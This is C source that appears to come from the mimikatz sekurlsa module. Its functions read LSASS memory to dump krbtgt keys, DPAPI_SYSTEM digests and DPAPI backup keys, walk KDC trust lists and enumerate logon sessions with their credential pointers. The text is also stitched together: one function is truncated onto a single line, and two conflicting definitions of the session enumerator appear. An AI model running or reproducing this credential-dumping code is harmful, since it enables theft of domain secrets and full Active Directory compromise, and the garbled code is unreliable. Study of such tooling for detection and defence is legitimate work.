/*
 * sekurlsa::krbtgt - dump the "Current" and "Previous" krbtgt key sets held by
 * the KDC service module (kdcsvc) inside LSASS.
 *
 * argc/argv are accepted for the command-table signature and are not read.
 * Returns the status of kuhl_m_sekurlsa_acquireLSA(); an absent KDC module or
 * a failed pattern search is reported on the console but does not alter it.
 */
NTSTATUS kuhl_m_sekurlsa_krbtgt(int argc, wchar_t * argv[])
{
	NTSTATUS status = kuhl_m_sekurlsa_acquireLSA();
	LONG slotIndex = 0;
	DUAL_KRBTGT keys = {NULL, NULL};
	KULL_M_MEMORY_HANDLE hOwn = {KULL_M_MEMORY_TYPE_OWN, NULL};
	KULL_M_MEMORY_ADDRESS remote, local = {&keys, &hOwn};

	if(!NT_SUCCESS(status))
		return status;

	if(!kuhl_m_sekurlsa_kdcsvc_package.Module.isPresent)
	{
		PRINT_ERROR(L"KDC service not in LSASS memory\n");
		return status;
	}

	remote.address = NULL;
	remote.hMemory = cLsass.hLsassMem;
	/* The search returns a base address plus an index that is scaled by
	 * sizeof(PVOID) to reach the DUAL_KRBTGT pointer pair for this build. */
	if(kuhl_m_sekurlsa_utils_search_generic(&cLsass, &kuhl_m_sekurlsa_kdcsvc_package.Module, SecDataReferences, ARRAYSIZE(SecDataReferences), &remote.address, NULL, NULL, &slotIndex))
	{
		remote.address = (PBYTE) remote.address + sizeof(PVOID) * slotIndex;
		/* Pull the two pointers (current / previous) out of LSASS; the pointed-to
		 * key material is read and printed by kuhl_m_sekurlsa_krbtgt_keys. */
		if(kull_m_memory_copy(&local, &remote, sizeof(DUAL_KRBTGT)))
		{
			kuhl_m_sekurlsa_krbtgt_keys(keys.krbtgt_current, L"Current");
			kuhl_m_sekurlsa_krbtgt_keys(keys.krbtgt_previous, L"Previous");
		}
	}
	return status;
}
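/*
 * Overwrite a buffer of secret bytes. The volatile-qualified pointer keeps the
 * compiler from discarding the stores as dead writes when the caller returns
 * (same purpose as SecureZeroMemory, without depending on it here).
 */
static void kuhl_m_sekurlsa_dpapi_system_wipe(volatile BYTE * p, size_t cb)
{
	while(cb--)
		*p++ = 0;
}

/*
 * sekurlsa::dpapi_system - read and print the DPAPI_SYSTEM secret from LSASS:
 * a "machine" and a "user" digest of SHA_DIGEST_LENGTH bytes each, located in
 * the DPAPI provider module (the dpapisrv package on Windows 8 and later, the
 * lsasrv package before that).
 *
 * argc/argv are accepted for the command-table signature and are not read.
 * Returns the status of kuhl_m_sekurlsa_acquireLSA(); an absent module, a
 * failed pattern search or an uninitialised secret only produce console output.
 *
 * Both digests are credential material: the local copies are wiped before the
 * function returns so they do not linger on the stack after being printed.
 */
NTSTATUS kuhl_m_sekurlsa_dpapi_system(int argc, wchar_t * argv[])
{
	NTSTATUS status = kuhl_m_sekurlsa_acquireLSA();
	KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
	KULL_M_MEMORY_ADDRESS aLsass = {NULL, cLsass.hLsassMem}, aLocal = {NULL, &hLocalMemory};
	PKUHL_M_SEKURLSA_PACKAGE pPackage = (cLsass.osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_8) ? &kuhl_m_sekurlsa_dpapi_svc_package : &kuhl_m_sekurlsa_dpapi_lsa_package;
	PVOID pBool = NULL, pShaSystem = NULL, pShaUser = NULL;
	BOOL fSystemCredsInitialized = 0;
	BYTE origInit, rgbSystemCredMachine[SHA_DIGEST_LENGTH], rgbSystemCredUser[SHA_DIGEST_LENGTH];

	if(NT_SUCCESS(status))
	{
		if(pPackage->Module.isPresent)
		{
			origInit = pPackage->Module.isInit;
			/* The search resolves three LSASS addresses: the "initialised" flag and
			 * the two digests of the system credential. */
			if(kuhl_m_sekurlsa_utils_search_generic(&cLsass, &pPackage->Module, SysCredReferences, ARRAYSIZE(SysCredReferences), &pBool, &pShaSystem, &pShaUser, NULL))
			{
				/* Original note: "trick to use same packages as normal module" -
				 * presumably the search flags the module as initialised and the
				 * regular package path must still run its own init; restore the
				 * saved flag (not verified here). */
				pPackage->Module.isInit = origInit;
				aLocal.address = &fSystemCredsInitialized;
				aLsass.address = pBool;
				if(kull_m_memory_copy(&aLocal, &aLsass, sizeof(fSystemCredsInitialized)))
				{
					if(fSystemCredsInitialized)
					{
						kprintf(L"DPAPI_SYSTEM\n");
						aLocal.address = &rgbSystemCredMachine;
						aLsass.address = pShaSystem;
						if(kull_m_memory_copy(&aLocal, &aLsass, sizeof(rgbSystemCredMachine)))
						{
							aLocal.address = &rgbSystemCredUser;
							aLsass.address = pShaUser;
							if(kull_m_memory_copy(&aLocal, &aLsass, sizeof(rgbSystemCredUser)))
							{
								/* "full" is the two digests concatenated; "m/u" prints the
								 * same bytes as separate machine / user halves. */
								kprintf(L"full: ");
								kull_m_string_wprintf_hex(rgbSystemCredMachine, sizeof(rgbSystemCredMachine), 0);
								kull_m_string_wprintf_hex(rgbSystemCredUser, sizeof(rgbSystemCredUser), 0);
								kprintf(L"\nm/u : ");
								kull_m_string_wprintf_hex(rgbSystemCredMachine, sizeof(rgbSystemCredMachine), 0);
								kprintf(L" / ");
								kull_m_string_wprintf_hex(rgbSystemCredUser, sizeof(rgbSystemCredUser), 0);
								kprintf(L"\n");
							}
						}
					}
					else PRINT_ERROR(L"Not initialized!\n");
				}
			}
		}
		else PRINT_ERROR(L"DPAPI service not in LSASS memory\n");
	}

	/* Scrub the secret copies on every path (a write to a buffer that was never
	 * filled is harmless). */
	kuhl_m_sekurlsa_dpapi_system_wipe(rgbSystemCredMachine, sizeof(rgbSystemCredMachine));
	kuhl_m_sekurlsa_dpapi_system_wipe(rgbSystemCredUser, sizeof(rgbSystemCredUser));
	return status;
}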
NTSTATUS kuhl_m_sekurlsa_bkeys(int argc, wchar_t * argv[]) { NTSTATUS status = kuhl_m_sekurlsa_acquireLSA(); PKUHL_M_SEKURLSA_LIB pLib; BOOL export = kull_m_string_args_byName(argc, argv, L"export", NULL, NULL); if(NT_SUCCESS(status)) { pLib = (cLsass.osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_8) ? &kuhl_m_sekurlsa_dpapi_svc_package.Module : &kuhl_m_sekurlsa_dpapi_lsa_package.Module; if(pLib->isPresent) { kprintf(L"\nCurrent prefered key: "); kuhl_m_sekurlsa_bkey(&cLsass, pLib, BackupKeyReferences, ARRAYSIZE(BackupKeyReferences), export); kprintf(L"\nCompatibility prefered key: "); kuhl_m_sekurlsa_bkey(&cLsass, pLib, BackupKeyReferencesCompat, ARRAYSIZE(BackupKeyReferencesCompat), export); } }
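/* Upper bound on entries followed through the KDC domain list. The Flink chain
 * is read out of LSASS (or a minidump) and may be inconsistent or corrupted; the
 * only natural terminator is "back at the list head", so a cycle that skips the
 * head would otherwise spin forever. */
enum { KUHL_M_SEKURLSA_TRUST_MAX_DOMAINS = 0x10000 };

/*
 * sekurlsa::trust - walk the KDC service's domain list in LSASS and hand each
 * KDC_DOMAIN_INFO entry to kuhl_m_sekurlsa_trust_domaininfo for printing.
 *
 * argc/argv are accepted for the command-table signature and are not read.
 * Only runs on builds >= KULL_M_WIN_BUILD_7 (Windows 7 / Server 2008 R2);
 * older builds get an error message. Returns the status of
 * kuhl_m_sekurlsa_acquireLSA(); an absent KDC module, a failed search or a
 * truncated walk only produce console output.
 */
NTSTATUS kuhl_m_sekurlsa_trust(int argc, wchar_t * argv[])
{
	NTSTATUS status = kuhl_m_sekurlsa_acquireLSA();
	PVOID buffer = NULL;
	size_t nbDomains = 0;
	KDC_DOMAIN_INFO domainInfo;
	KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
	KULL_M_MEMORY_ADDRESS aLsass = {NULL, cLsass.hLsassMem}, data = {&buffer, &hBuffer}, aBuffer = {&domainInfo, &hBuffer};

	if(cLsass.osContext.BuildNumber >= KULL_M_WIN_BUILD_7)
	{
		if(NT_SUCCESS(status))
		{
			if(kuhl_m_sekurlsa_kdcsvc_package.Module.isPresent)
			{
				/* aLsass.address receives the LSASS address of the list head. */
				if(kuhl_m_sekurlsa_utils_search_generic(&cLsass, &kuhl_m_sekurlsa_kdcsvc_package.Module, DomainListReferences, ARRAYSIZE(DomainListReferences), &aLsass.address, NULL, NULL, NULL))
				{
					/* Read the head's first pointer-sized field (its Flink) into the
					 * local `buffer`. */
					if(kull_m_memory_copy(&data, &aLsass, sizeof(PVOID)))
					{
						/* From here on `data` addresses LSASS memory, not the local copy. */
						data.address = buffer;
						data.hMemory = cLsass.hLsassMem;
						while(data.address != aLsass.address)
						{
							/* Never trust a pointer chain read from the target to terminate. */
							if(nbDomains++ >= KUHL_M_SEKURLSA_TRUST_MAX_DOMAINS)
							{
								PRINT_ERROR(L"Domain list too long or cyclic, stopping\n");
								break;
							}
							if(kull_m_memory_copy(&aBuffer, &data, sizeof(KDC_DOMAIN_INFO)))
							{
								kuhl_m_sekurlsa_trust_domaininfo(&domainInfo);
								data.address = domainInfo.list.Flink;
							}
							else break;
						}
					}
				}
			}
			else PRINT_ERROR(L"KDC service not in LSASS memory\n");
		}
	}
	else PRINT_ERROR(L"Only for >= 2008r2\n");
	return status;
}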
/*
 * Enumerate the logon sessions recorded in LSASS and invoke `callback` once per
 * session with a KIWI_BASIC_SECURITY_LOGON_SESSION_DATA view of the entry.
 *
 * callback      - receives the session view and pOptionalData; returning FALSE
 *                 stops the walk (later lists are still opened, but none of
 *                 their entries are read or reported).
 * pOptionalData - passed through to callback untouched.
 * Returns the status of kuhl_m_sekurlsa_acquireLSA().
 *
 * The in-memory layout of a logon-session entry differs per OS build; `helper`
 * picks the lsassEnumHelpers row holding the entry size (tailleStruct) and the
 * field offsets. Each entry is copied out of LSASS into a LocalAlloc'd buffer of
 * tailleStruct bytes and the view's pointer fields point into that copy. The
 * UNICODE_STRING buffers and the SID are fetched into local allocations that
 * are released as soon as the callback returns, so the callback must not keep
 * pointers to them.
 */
NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalData)
{
	KIWI_BASIC_SECURITY_LOGON_SESSION_DATA sessionData;
	ULONG nbListes = 1, i; /* number of logon-session lists; 1 unless LSASS says otherwise */
	PVOID pStruct;
	KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
	/* `data` is reused for both local and LSASS addresses below - watch hMemory. */
	KULL_M_MEMORY_ADDRESS securityStruct, data = {&nbListes, &hLocalMemory}, aBuffer = {NULL, &hLocalMemory};
	BOOL retCallback = TRUE;
	const KUHL_M_SEKURLSA_ENUM_HELPER * helper;
	NTSTATUS status = kuhl_m_sekurlsa_acquireLSA();
	if(NT_SUCCESS(status))
	{
		sessionData.cLsass = &cLsass;
		sessionData.lsassLocalHelper = lsassLocalHelper;
		/* Select the layout row by build number. Row 4 is reached only through
		 * the pointer bump below. */
		if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_2K3)
			helper = &lsassEnumHelpers[0];
		else if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_VISTA)
			helper = &lsassEnumHelpers[1];
		else if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_7)
			helper = &lsassEnumHelpers[2];
		else if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_8)
			helper = &lsassEnumHelpers[3];
		else if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_BLUE)
			helper = &lsassEnumHelpers[5];
		else
			helper = &lsassEnumHelpers[6];
		/* Intentional pointer bump (original comment: "yeah, really, I do that"):
		 * on Windows 7 / 8 builds whose msv1_0 TimeDateStamp is newer than
		 * 0x53480000, use the next helper row - presumably a later msv1_0
		 * servicing release changed the structure layout (not verified here). */
		if((cLsass.osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_7) && (cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_BLUE) && (kuhl_m_sekurlsa_msv_package.Module.Informations.TimeDateStamp > 0x53480000))
			helper++;
		securityStruct.hMemory = cLsass.hLsassMem;
		/* Assignment in the condition is deliberate: when the list-count symbol
		 * was resolved, overwrite nbListes with the value read from LSASS. A failed
		 * copy is not checked and leaves the default of 1. */
		if(securityStruct.address = LogonSessionListCount)
			kull_m_memory_copy(&data, &securityStruct, sizeof(ULONG));
		for(i = 0; i < nbListes; i++)
		{
			/* LogonSessionList apparently points into LSASS, so &LogonSessionList[i]
			 * is the remote address of the i-th list head. */
			securityStruct.address = &LogonSessionList[i];
			data.address = &pStruct;
			data.hMemory = &hLocalMemory;
			/* NOTE(review): a failed LocalAlloc silently skips this whole list. */
			if(aBuffer.address = LocalAlloc(LPTR, helper->tailleStruct))
			{
				/* Read the head's first pointer (Flink of the first entry) into pStruct. */
				if(kull_m_memory_copy(&data, &securityStruct, sizeof(PVOID)))
				{
					/* From here `data` addresses LSASS memory. */
					data.address = pStruct;
					data.hMemory = securityStruct.hMemory;
					/* NOTE(review): the walk ends only when Flink returns to the list head
					 * or a read fails; a corrupted or cyclic list in the target (or a
					 * damaged minidump) would loop forever - there is no entry cap. */
					while((data.address != securityStruct.address) && retCallback)
					{
						if(kull_m_memory_copy(&aBuffer, &data, helper->tailleStruct))
						{
							/* Build the view over the local copy using the per-build offsets. */
							sessionData.LogonId = (PLUID) ((PBYTE) aBuffer.address + helper->offsetToLuid);
							sessionData.LogonType = *((PULONG) ((PBYTE) aBuffer.address + helper->offsetToLogonType));
							sessionData.Session = *((PULONG) ((PBYTE) aBuffer.address + helper->offsetToSession));
							sessionData.UserName = (PUNICODE_STRING) ((PBYTE) aBuffer.address + helper->offsetToUsername);
							sessionData.LogonDomain = (PUNICODE_STRING) ((PBYTE) aBuffer.address + helper->offsetToDomain);
							sessionData.pCredentials= *(PVOID *) ((PBYTE) aBuffer.address + helper->offsetToCredentials);
							sessionData.pSid = *(PSID *) ((PBYTE) aBuffer.address + helper->offsetToPSid);
							sessionData.pCredentialManager = *(PVOID *) ((PBYTE) aBuffer.address + helper->offsetToCredentialManager);
							sessionData.LogonTime = *((PFILETIME) ((PBYTE) aBuffer.address + helper->offsetToLogonTime));
							sessionData.LogonServer = (PUNICODE_STRING) ((PBYTE) aBuffer.address + helper->offsetToLogonServer);
							/* The string buffers and SID still point into LSASS; these helpers
							 * replace them with local copies (freed right after the callback). */
							kull_m_string_getUnicodeString(sessionData.UserName, cLsass.hLsassMem);
							kull_m_string_getUnicodeString(sessionData.LogonDomain, cLsass.hLsassMem);
							kull_m_string_getUnicodeString(sessionData.LogonServer, cLsass.hLsassMem);
							kull_m_string_getSid(&sessionData.pSid, cLsass.hLsassMem);
							retCallback = callback(&sessionData, pOptionalData);
							if(sessionData.UserName->Buffer)
								LocalFree(sessionData.UserName->Buffer);
							if(sessionData.LogonDomain->Buffer)
								LocalFree(sessionData.LogonDomain->Buffer);
							if(sessionData.LogonServer->Buffer)
								LocalFree(sessionData.LogonServer->Buffer);
							if(sessionData.pSid)
								LocalFree(sessionData.pSid);
							/* Follow the copied entry's Flink to the next remote entry. */
							data.address = ((PLIST_ENTRY) (aBuffer.address))->Flink;
						}
						else break;
					}
				}
				LocalFree(aBuffer.address);
			}
		}
	}
	return status;
}
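/*
 * sekurlsa strings command - iterate the memory information of the attached
 * LSASS handle through kull_m_process_getMemoryInformations, invoking
 * kuhl_m_sekurlsa_enum_range for each region with the LSASS memory handle as
 * the callback context.
 *
 * argc/argv are accepted for the command-table signature and are not read.
 * Returns the status of kuhl_m_sekurlsa_acquireLSA(), like the sibling
 * sekurlsa commands; the previous version returned STATUS_SUCCESS
 * unconditionally, which hid an attach failure from the caller.
 */
NTSTATUS kuhl_m_sekurlsa_strings(int argc, wchar_t * argv[])
{
	NTSTATUS status = kuhl_m_sekurlsa_acquireLSA();
	if(NT_SUCCESS(status))
		kull_m_process_getMemoryInformations(cLsass.hLsassMem, kuhl_m_sekurlsa_enum_range, (PVOID) cLsass.hLsassMem);
	return status;
}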
/*
 * Enumerate the logon sessions recorded in LSASS and invoke `callback` once per
 * session with a KIWI_BASIC_SECURITY_LOGON_SESSION_DATA view of the entry.
 *
 * This appears to be a second (earlier) revision of kuhl_m_sekurlsa_enum as
 * shown on this page: it selects the layout by major/minor OS version and fills
 * fewer fields (no credential-manager pointer, logon time or logon server). A
 * single translation unit cannot contain both definitions.
 *
 * callback      - receives the session view and pOptionalData; returning FALSE
 *                 stops the walk (later lists are still opened, but none of
 *                 their entries are read or reported).
 * pOptionalData - passed through to callback untouched.
 * Returns the status of kuhl_m_sekurlsa_acquireLSA().
 *
 * UserName/LogonDomain buffers and the SID are replaced by local copies before
 * the callback and released right after it returns; the callback must not keep
 * pointers to them.
 */
NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalData)
{
	KIWI_BASIC_SECURITY_LOGON_SESSION_DATA sessionData;
	ULONG nbListes = 0, i; /* number of logon-session lists; 0 if the count cannot be read */
	PVOID pStruct;
	KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
	/* `data` is reused for both local and LSASS addresses below - watch hMemory. */
	KULL_M_MEMORY_ADDRESS securityStruct, data = {&nbListes, &hLocalMemory}, aBuffer = {NULL, &hLocalMemory};
	BOOL retCallback = TRUE;
	const KUHL_M_SEKURLSA_ENUM_HELPER * helper;
	NTSTATUS status = kuhl_m_sekurlsa_acquireLSA();
	if(NT_SUCCESS(status))
	{
		sessionData.cLsass = &cLsass;
		sessionData.lsassLocalHelper = lsassLocalHelper;
		/* Layout row by OS version: pre-Vista, Vista/7, 8, 8.1 and later. */
		if(cLsass.osContext.MajorVersion < 6)
			helper = &lsassEnumHelpers[0];
		else if(cLsass.osContext.MinorVersion < 2)
			helper = &lsassEnumHelpers[1];
		else if(cLsass.osContext.MinorVersion < 3)
			helper = &lsassEnumHelpers[2];
		else
			helper = &lsassEnumHelpers[3];
		securityStruct.hMemory = cLsass.hLsassMem;
		securityStruct.address = LogonSessionListCount;
		/* With a resolved count symbol read nbListes from LSASS (copy failure is
		 * not checked and leaves 0, so nothing is enumerated); without one assume
		 * a single list - data.address is &nbListes here. */
		if(securityStruct.address)
			kull_m_memory_copy(&data, &securityStruct, sizeof(ULONG));
		else
			*(PULONG) data.address = 1;
		for(i = 0; i < nbListes; i++)
		{
			/* LogonSessionList apparently points into LSASS, so &LogonSessionList[i]
			 * is the remote address of the i-th list head. */
			securityStruct.address = &LogonSessionList[i];
			data.address = &pStruct;
			data.hMemory = &hLocalMemory;
			/* NOTE(review): a failed LocalAlloc silently skips this whole list. */
			if(aBuffer.address = LocalAlloc(LPTR, helper->tailleStruct))
			{
				/* Read the head's first pointer (Flink of the first entry) into pStruct. */
				if(kull_m_memory_copy(&data, &securityStruct, sizeof(PVOID)))
				{
					/* From here `data` addresses LSASS memory. */
					data.address = pStruct;
					data.hMemory = securityStruct.hMemory;
					/* NOTE(review): the walk ends only when Flink returns to the list head
					 * or a read fails; a corrupted or cyclic list in the target would
					 * loop forever - there is no entry cap. */
					while((data.address != securityStruct.address) && retCallback)
					{
						if(kull_m_memory_copy(&aBuffer, &data, helper->tailleStruct))
						{
							/* Build the view over the local copy using the per-build offsets. */
							sessionData.LogonId = (PLUID) ((PBYTE) aBuffer.address + helper->offsetToLuid);
							sessionData.LogonType = *((PULONG) ((PBYTE) aBuffer.address + helper->offsetToLogonType));
							sessionData.Session = *((PULONG) ((PBYTE) aBuffer.address + helper->offsetToSession));
							sessionData.UserName = (PUNICODE_STRING) ((PBYTE) aBuffer.address + helper->offsetToUsername);
							sessionData.LogonDomain = (PUNICODE_STRING) ((PBYTE) aBuffer.address + helper->offsetToDomain);
							sessionData.pCredentials= *(PVOID *) ((PBYTE) aBuffer.address + helper->offsetToCredentials);
							sessionData.pSid = *(PSID *) ((PBYTE) aBuffer.address + helper->offsetToPSid);
							/* Replace the LSASS-pointing buffers/SID with local copies. */
							kull_m_string_getUnicodeString(sessionData.UserName, cLsass.hLsassMem);
							kull_m_string_getUnicodeString(sessionData.LogonDomain, cLsass.hLsassMem);
							kuhl_m_sekurlsa_utils_getSid(&sessionData.pSid, cLsass.hLsassMem);
							retCallback = callback(&sessionData, pOptionalData);
							/* Released unconditionally (no NULL guard in this revision). */
							LocalFree(sessionData.UserName->Buffer);
							LocalFree(sessionData.LogonDomain->Buffer);
							LocalFree(sessionData.pSid);
							/* Follow the copied entry's Flink to the next remote entry. */
							data.address = ((PLIST_ENTRY) (aBuffer.address))->Flink;
						}
						else break;
					}
				}
				LocalFree(aBuffer.address);
			}
		}
	}
	return status;
}